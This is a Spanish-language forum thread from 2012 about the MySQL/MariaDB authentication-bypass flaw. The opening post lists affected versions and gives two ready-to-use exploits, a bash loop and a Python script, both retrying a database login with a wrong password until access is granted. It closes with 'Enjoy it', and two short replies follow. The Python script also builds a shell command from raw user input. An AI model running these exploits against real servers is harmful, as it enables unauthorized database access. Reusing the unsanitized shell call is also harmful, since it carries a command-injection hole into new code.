Página 1 de 1

Grave Vulnerabilidad MySql (11/6/12)

Publicado: 11 Jun 2012, 12:01
por osnaraus
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>
En Python:

Código: Seleccionar todo

#!/usr/bin/python
import subprocess
t=0 
user = raw_input("DBUser: ")
ip_adress = raw_input("IP: ")
while 1:
        print "Solicitando: ", t
        subprocess.Popen("mysql -u " +user +" -h "+ip_adress+" --password=blah", shell=True).wait()
        if(t> 999):
                print "El servidor no es vulnerable!"
                break;
        t=t+1
Enjoy it

Ref:
[Enlace externo eliminado para invitados]

[Enlace externo eliminado para invitados]

Re: Grave Vulnerabilidad MySql (11/6/12)

Publicado: 16 Jun 2012, 07:43
por Bin4riO
Gracias por la información sera de utilidad. Saludos

Re: Grave Vulnerabilidad MySql (11/6/12)

Publicado: 18 Ago 2012, 14:44
por nixh
una pena que no sirva para la version de mysql 5.1.58